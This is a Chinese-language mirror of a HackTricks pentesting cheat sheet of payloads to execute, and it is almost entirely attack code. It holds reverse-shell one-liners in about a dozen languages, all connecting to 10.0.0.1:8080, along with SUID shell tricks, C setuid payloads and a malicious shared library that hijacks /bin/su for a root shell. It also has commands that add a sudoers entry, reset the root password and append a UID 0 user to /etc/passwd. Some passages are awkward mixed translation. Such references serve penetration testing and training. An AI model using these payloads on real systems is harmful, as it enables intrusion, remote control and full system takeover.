mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-30 08:30:57 +00:00
12 KiB
12 KiB
执行负载
☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 YouTube 🎥
- 你在一家网络安全公司工作吗?想要在 HackTricks 中宣传你的公司吗?或者你想要获取最新版本的 PEASS 或下载 HackTricks 的 PDF吗?请查看订阅计划!
- 发现我们的独家NFTs收藏品——The PEASS Family
- 获取官方 PEASS & HackTricks 商品
- 加入💬 Discord 群组 或 Telegram 群组,或者关注我在推特上的🐦@carlospolopm。
- 通过向hacktricks 仓库和hacktricks-cloud 仓库提交 PR 来分享你的黑客技巧。
Bash
cp /bin/bash /tmp/b && chmod +s /tmp/b
/bin/b -p #Maintains root privileges from suid, working in debian & buntu
C
Shell
bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
0<&196;exec 196<>/dev/tcp/10.0.0.1/8080; sh <&196 >&196 2>&196
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
PHP
php -r '$sock=fsockopen("10.0.0.1",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",8080);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
nc -e /bin/sh 10.0.0.1 8080
nc -e /bin/bash 10.0.0.1 8080
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 8080 >/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.0.1 8080 >/tmp/f
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm
xterm -display 10.0.0.1:1
xterm -display 10.0.0.1:1 -e /bin/bash
socat
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:8080
socat file:`tty`,raw,echo=0 tcp-listen:8080
Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet 10.0.0.1 8080 0/tmp/p
telnet 10.0.0.1 8080 | /bin/bash | telnet 10.0.0.1 8081
PowerShell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Node.js
require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1');
require('child_process').exec('bash -i >& /dev/tcp/10.0.0.1/8080 0>&1');
Lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','8080');os.execute('/bin/sh -i <&3 >&3 2>&3');"
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','8080');os.execute('/bin/bash -i <&3 >&3 2>&3');"
MySQL
\! /bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
\! /bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
AWK
awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/8080"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}'
awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/8080"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}'
AWK (alternative)
awk 'BEGIN {system("/bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1")}'
awk 'BEGIN {system("/bin/bash -i >& /dev/tcp/10.0.0.1/8080 0>&1")}'
AWK (alternative)
awk 'BEGIN {system("/bin/bash -c \"bash -i >& /dev/tcp/10.0.0.1/8080 0>&1\"")}'
awk 'BEGIN {system("/bin/bash -c \"bash -i >& /dev/tcp/10.0.0.1/8080 0>&1\"")}'
//gcc payload.c -o payload
int main(void){
setresuid(0, 0, 0); //Set as user suid user
system("/bin/sh");
return 0;
}
//gcc payload.c -o payload
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
int main(){
setuid(getuid());
system("/bin/bash");
return 0;
}
// Privesc to user id: 1000
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main(void) {
char *const paramList[10] = {"/bin/bash", "-p", NULL};
const int id = 1000;
setresuid(id, id, id);
execve(paramList[0], paramList, NULL);
return 0;
}
覆盖文件以提升权限
常见文件
- 在 /etc/passwd 中添加带密码的用户
- 在 /etc/shadow 中更改密码
- 在 /etc/sudoers 中将用户添加到sudoers
- 通过docker套接字滥用docker,通常在 /run/docker.sock 或 /var/run/docker.sock 中
覆盖库文件
检查某个二进制文件使用的库文件,例如 /bin/su
:
ldd /bin/su
linux-vdso.so.1 (0x00007ffef06e9000)
libpam.so.0 => /lib/x86_64-linux-gnu/libpam.so.0 (0x00007fe473676000)
libpam_misc.so.0 => /lib/x86_64-linux-gnu/libpam_misc.so.0 (0x00007fe473472000)
libaudit.so.1 => /lib/x86_64-linux-gnu/libaudit.so.1 (0x00007fe473249000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fe472e58000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fe472c54000)
libcap-ng.so.0 => /lib/x86_64-linux-gnu/libcap-ng.so.0 (0x00007fe472a4f000)
/lib64/ld-linux-x86-64.so.2 (0x00007fe473a93000)
在这种情况下,让我们尝试冒充 /lib/x86_64-linux-gnu/libaudit.so.1
。
因此,检查 su
二进制文件使用的此库的函数:
objdump -T /bin/su | grep audit
0000000000000000 DF *UND* 0000000000000000 audit_open
0000000000000000 DF *UND* 0000000000000000 audit_log_user_message
0000000000000000 DF *UND* 0000000000000000 audit_log_acct_message
000000000020e968 g DO .bss 0000000000000004 Base audit_fd
符号audit_open
、audit_log_acct_message
、audit_log_acct_message
和audit_fd
可能来自于libaudit.so.1库。由于恶意共享库将覆盖libaudit.so.1,这些符号应该存在于新的共享库中,否则程序将无法找到符号并退出。
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
//gcc -shared -o /lib/x86_64-linux-gnu/libaudit.so.1 -fPIC inject.c
int audit_open;
int audit_log_acct_message;
int audit_log_user_message;
int audit_fd;
void inject()__attribute__((constructor));
void inject()
{
setuid(0);
setgid(0);
system("/bin/bash");
}
现在,只需调用 /bin/su
,您将获得 root 权限的 shell。
脚本
您能让 root 执行某些操作吗?
将 www-data 添加到 sudoers
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
更改 root 密码
To change the root password, you can use the following command:
要更改 root 密码,可以使用以下命令:
sudo passwd root
You will be prompted to enter the new password twice. After successfully changing the password, you can log in as root using the new password.
echo "root:hacked" | chpasswd
将新的root用户添加到/etc/passwd文件中
To add a new root user to the /etc/passwd
file, you can follow these steps:
- Open the
/etc/passwd
file using a text editor. - Locate the line that starts with
root
and copy it. - Paste the copied line at the end of the file.
- Modify the username to a unique name for the new root user.
- Change the user ID (UID) to
0
to assign root privileges. - Change the group ID (GID) to
0
to assign root group privileges. - Update the home directory and shell fields if necessary.
- Save the changes and exit the text editor.
After completing these steps, you will have successfully added a new root user to the /etc/passwd
file.
echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd
☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在一家 网络安全公司 工作吗?你想在 HackTricks 中看到你的 公司广告吗?或者你想获得 PEASS 的最新版本或下载 HackTricks 的 PDF 吗?请查看 订阅计划!
- 发现我们的独家 NFTs 集合 The PEASS Family
- 获得 官方 PEASS & HackTricks 商品
- 加入 💬 Discord 群组 或 电报群组,或者在 Twitter 上 关注 我 🐦@carlospolopm。
- 通过向 hacktricks 仓库 和 hacktricks-cloud 仓库 提交 PR 来分享你的黑客技巧。